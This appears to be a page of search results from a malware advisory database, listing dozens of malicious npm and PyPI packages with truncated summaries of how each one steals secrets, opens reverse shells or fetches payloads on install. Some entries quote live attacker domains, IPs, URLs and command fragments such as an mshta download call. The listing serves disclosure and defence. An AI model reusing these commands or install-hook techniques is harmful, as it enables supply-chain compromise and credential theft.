225918 matches found
Malicious code in metrics-probe-88ad (npm)
Source: ghsa-malware 55133df30aa5d5678607d6f0a32d8b292c4fdf876893978a6785209304434fe6 Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be...
Malicious code in fmt-helpers-794b (npm)
Source: amazon-inspector 19b05306978ff506805f118049f81c74c5da1503bb34fd14a2a57d4e6faac52c Package declares a postinstall lifecycle hook "postinstall": "node run.js" in package.json that runs run.js automatically on npm install. run.js...
Malicious code in @ncurran/sandbox-recon-sys-5f1b (npm)
Source: ghsa-malware 0f4f0ce20b0ebc74a6cc6447e493d56421999e17f0f980661c9baab280032850 Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be...
Malicious code in @ncurran/dc-selftest-ba0ad4 (npm)
Source: ghsa-malware 945bb6ebb1c34a64499b626b76d65ee3241c5018390eba029b3654bef389786c Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be...
Malicious code in @ncurran/sandbox-recon-sys-6a3f (npm)
Source: ghsa-malware 608b0bb395714d269bf26dcde1f7863b0376062eb1b1707f2a7dd4dac279574b Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be...
Malicious code in @ncurran/sandbox-recon-7c4e1a (npm)
Source: ghsa-malware c1184134c86ce193b3abfb06949b3ce9ba51711e8e5615405d4f2ab63aa51a89 Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be...
Malicious code in @ncurran/sandbox-recon-9b2d4f (npm)
Source: ghsa-malware e26a43461da776d8145183e606db9c9bdbfaa1a053e76c44ce1f78ec1364ec1f Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be...
Malicious code in @ncurran/sandbox-recon-sys-5b2c (npm)
Source: ghsa-malware 2e23f53a4a0894697fe17ba0cb492b742f0cc7c213b99b42f455d608e14410ae Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be...
Malicious code in @ncurran/sandbox-recon-880538 (npm)
Source: ghsa-malware 1b2312abdf908648141abd660e3384044ccd92cfdfd9ba75feb382aeb49011a1 Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be...
Malicious code in @ncurran/sandbox-recon-uac-4e7c (npm)
Source: ghsa-malware 115efe1e922669b73488b969fea50128ffb8c0b8a5ef462d6c6319feaf1ce578 Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be...
Malicious code in npm-sandbox-research-f1g2 (npm)
Source: ghsa-malware bd8a780bcd6850a1b4b810de411bf39db7f5b3f37e581a5a45d0e83215b0f339 Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be...
Malicious code in npm-sandbox-research-a1b2 (npm)
Source: ghsa-malware bd030068356281ae499fe6af7fd86ae10cac9f77f2f3fcc4d2d9abb67750be19 Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be...
Malicious code in uol-simple-api-futebol (npm)
Source: amazon-inspector c78d7d6a66f5f57c16ee4d4d39ea4dbfd4ac5b76192de1a8da86099405848334 The package advertises itself as a scraper of UOL football schedules, but its main exported function getJogos routes through getUOLData →...
Malicious code in @civitatis/bot-ui (npm)
Source: amazon-inspector e51e58cf925eb7dd4e084a2e78e22b0a0db0f1f82663101e34110258839f98f7 The package declares "preinstall": "node index.js" in package.json, causing index.js to execute automatically on npm install. index.js requires...
Malicious code in @mastra/observability (npm)
Source: ghsa-malware 63af3788f9b84fab72e7db143b8001af24c070088aaab8c4de3323cdf259dd66 Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be...
Malicious code in n8n-nodes-security-test-poc (npm)
Source: amazon-inspector fa97d4701c29ef5305fa5b553ab560abd6db6cc33b72f99dc11621997b668f32 Package presents as an n8n community node but is an attack artifact. The node's execute in dist/SecurityTestNode.node.js queries AWS IMDSv1/v2...
Malicious code in swift-parse-stream (npm)
Source: amazon-inspector 8ab8561c6c561b045d817d4fab3aa0754ce7cd767a3c5ec07b95151dda6b92c8 swift-parse-stream advertises itself as an SVG sanitizer/minifier but ships an undocumented getPlugin export in index.js that, when invoked, performs...
Malicious code in quirky-token (npm)
Source: amazon-inspector b263413912feb72882ee0b52e7025c636ed98472ba90e6db4714b3b111b4e2e8 The package is advertised as an SVG sanitizer but exposes an undocumented getPlugin export whose returned function fetches JSON from...
Malicious code in sodel-pych (npm)
Source: ghsa-malware 95b8b8f54c9c2a4fa965e4a7fe7ea9c8f8ef1b5bcdd4cc1da7354d0ce2e8842f Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be...
Malicious code in sort-btree (npm)
Source: ghsa-malware 6c3b0d783c53decf1a240f02276991c7c00a8b72f0d3988a7e86be90464da38d Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be...
Malicious code in profiling-keychain (npm)
The npm package profiling-keychain published by npm user sproger, [email protected] is a deceptive React Native component and part of a coordinated 37-package campaign across two attacker-controlled domains surrprisingcoompanny.lol and barbellmate.xyz. On component mount it registers...
Malicious code in backgroundprocessing-contextmenus (npm)
The npm package backgroundprocessing-contextmenus published by npm user sproger, [email protected] is a deceptive React Native component and part of a coordinated 37-package campaign across two attacker-controlled domains surrprisingcoompanny.lol and barbellmate.xyz. On component mount it...
Malicious code in analytics-readability-gestures (npm)
The npm package analytics-readability-gestures published by npm user sproger, [email protected] is a deceptive React Native component and part of a coordinated 37-package campaign across two attacker-controlled domains surrprisingcoompanny.lol and barbellmate.xyz. On component mount it...
Malicious code in @mastra/voice-playai (npm)
Source: ghsa-malware 9279891e04d7670f84ecfe2e8c0d680c63d965a5626b42bc7f393bb7b3d07710 Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be...
Malicious code in @mastra/otel-exporter (npm)
Source: ghsa-malware e5d973fa28a778f38f657666d9f26b5ff350ab4de18ae930c3ee9fd4732edfb6 Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be...
Malicious code in cryptodao-config (npm)
Source: amazon-inspector 2b5f3b7ec6eecce3d891664f33660a1c612cdd3c6ac99ba52633ef77a2df543c On npm install, the postinstall hook runs node recon.js, which harvests installer-side secrets and POSTs them over HTTPS with TLS certificate...
Malicious code in backoffice-charges-module (npm)
Source: amazon-inspector 047eb92a0e8bb401b2c205765616c9b4b715ee7cfd33d2e6ef9dc8d645b77f04 On every npm install, the preinstall lifecycle script node index.js > /dev/null 2>&1 silently HTTPS-POSTs a JSON payload to https://avamnrwqo7.rbmock.de...
Malicious code in js-digest (npm)
Source: amazon-inspector 52847ff329757e0777e62c1c060455abc4ddd6f002c295a7f38d0e0489daf76f Package impersonates crypto-js: name is js-digest but package.json carries crypto-js's exact description "JavaScript library of cryptography...
Malicious code in conducts (npm)
Source: ghsa-malware 5fc899376af9cf86b0ddfddeb5e2a904ce8a5109fc293b0c115c1f7e3633fe2d Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be...
Malicious code in obfus-jsxy (npm)
Source: ghsa-malware 9ce27a1ed5e4a461b1b62b5477d05bc1f7ae0b8c41d7a8bc8c116279fa1521e4 Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be...
Malicious code in redis-xyz (npm)
Source: ghsa-malware 3995a53806a8d65f0d672a7f946ffd2f1b2b73e30cbc85f19c06e63a081fa811 Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be...
Malicious code in temp-development-package-test (PyPI)
Source: kam193 5cdc1d94dd0cfb62a4a0267ae52bf1a72dfa31a6854196b4bb220759b7c6e878 Starting with version 0.4, package installs a sitecustomize.py that executes during Python engine initialization. The embedded code uses mshta to download...
Malicious code in tailwind-typography-style (npm)
Source: amazon-inspector 5b5b1eea6bfed81a0e57b9af519c45155347e3937a20dc8ef4e9ab1cae6ff73d The package impersonates @tailwindcss/typography by name and ships a verbatim copy of tailwindlabs/tailwindcss-typography's src/ tree index.js,...
Malicious code in richtext-editor-ui (npm)
Source: amazon-inspector fe87b6998b0d91eb7eefb71e37d8145b5db79b79dd21bc1ffda10d56d64b6d16 On npm install, postinstall.js base64-decodes a hardcoded URL https://www.jsonkeeper.com/b/7EBZP, fetches its body via axios, and pipes the response...
Malicious code in slow-surf (npm)
Source: ghsa-malware 9f66d2ad1de3674c7aa5dd5efdb00624f0d1ff7f6f1ed38f054e6ca018dea673 Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be...
Malicious code in testpackagemanyhttpsgo (PyPI)
Source: amazon-inspector 336f39e218fe5b5a09ef8ee7757efa7a0ca73c0fe6571bc232d735448499a950 At install time, setup.py fetches https://tmpfiles.org/dl/wawHVGgfydD7/6a306c5f03a52.exe via urllib, writes the response to disk, and executes it wit...
Malicious code in twrap-toolkit (PyPI)
Source: amazon-inspector 174cba09d5ec9724bd55871c7f74c27ff8592bf55c06464204e0591667377259 twraptoolkit/init.py defines getpayload which issues a plaintext HTTP request to http://194.5.152.9:8080/hacks/textwrap-toolkit/textwraptoolkit/init....
Malicious code in cipherflow (PyPI)
Source: amazon-inspector 281ede3c5b3181c2df22a4b32a01453a51ac389a1dfe8bde69d53821cbaf20d4 cipherflow advertises itself as a zero-dependency pure-Python AES/DES library, but cipherflow/environ.py contains a multi-layer-obfuscated payload th...
Malicious code in @wacrot/infra-data-kit (npm)
Source: amazon-inspector 1568dfa61d19a63f6837c4a8c9b5d728401d0f34c87ce3550af594c141a94ac1 On any require or import of @wacrot/infra-data-kit, src/index.js invokes addSupport at module top level, which spawns a detached bash -c 'curl -fsSL...
Malicious code in postcss-minify-selector (npm)
Source: amazon-inspector 1bc7341d6762a6209e4bde3d99f31f1a8650b6971e64a19547b9f35e7a51abb3 Package is published as postcss-minify-selector (singular) but its internal postcss plugin identifier is postcss-minify-selectors (plural) — the canonica...
Malicious code in yunxin-overmind-comment (npm)
Source: amazon-inspector 57551a10d99024d1d12c7f2e349e6557613ed3a5e036bf45d71129d501fbbabc On npm install, the package's scripts.postinstall runs src/postinstall.js, which spawns a detached Node child that collects the installer's hostname,...
Malicious code in intel-ai-safety-explainer (PyPI)
Source: kam193 7561bb0b816a4521b6de43bce01afa55516a7201b6daa7696de4924623557f90 Installing the package or importing the module exfiltrates basic information about the host, and the package has no other purpose. --- Category: PROBABLYPENTES...
Malicious code in hello-test-s1 (PyPI)
Source: kam193 3e38aef2a7eaa434284aa00122cf429e1a1a07658e02afec7bb3690d7cbfe9ec During installation or importing the module, the package starts a reverse shell to a hardcoded location --- Category: MALICIOUS - The campaign has clearly...
Malicious code in dispatch-internal-plugins (PyPI)
Source: kam193 5993e79eab55ecc24ada6a4bce88f580c958499d51d0d7472e74aad904648964 Installing the package or importing the module exfiltrates basic information about the host, and the package has no other purpose. --- Category: PROBABLYPENTES...
Malicious code in gigl-core (PyPI)
Source: kam193 28903f76bed2e89a18c9c276d62c95bb089a091020f89f35f7d2800ef6a3bce3 Installing the package or importing the module exfiltrates basic information about the host, and the package has no other purpose. --- Category: PROBABLYPENTES...
Malicious code in intel-ai-safety (PyPI)
Source: kam193 7bafa4e952ec2e2db6e164f8bf385088c38438396f02f8096c28a6105878e729 Installing the package or importing the module exfiltrates basic information about the host, and the package has no other purpose. --- Category: PROBABLYPENTES...
Malicious code in mozautomation (PyPI)
Source: kam193 26d0e7dfb965969f23786d4bde7d70e597b83df522434aea471171d48442cd12 Installing the package or importing the module exfiltrates basic information about the host, and the package has no other purpose. --- Category: PROBABLYPENTES...
Malicious code in scriptworker-client (PyPI)
Source: kam193 b8cdfb6bd0db2d192ccd67b0ebb8023dee7343620b9a48c95cc58b5e1ee536f0 Installing the package or importing the module exfiltrates basic information about the host, and the package has no other purpose. --- Category: PROBABLYPENTES...
Malicious code in testpgagent (PyPI)
Source: amazon-inspector c3b12f57a72964e978d195ad7c3a9f6fe560ad1990d55bb1b4053d88a6bb9c4f On pip install, setup.py line 19 calls exec(base64.b64decode(...)) whose decoded body is import os; os.system('cmd /c "mshta http://fixars.top"'). This...
Malicious code in flow-lending (npm)
Sentinel-high 9.9.9 dependency-confusion squat of an internal Cardano/DeFi lending pkg. preinstall node index.js || true auto-execs a credential exfil: harvests env secrets mnemonic/private key/token/blockfrost API key and POSTs to raw attacker C2 2.25.140.71:8443/surflending/npm-confusion. 2-pkg...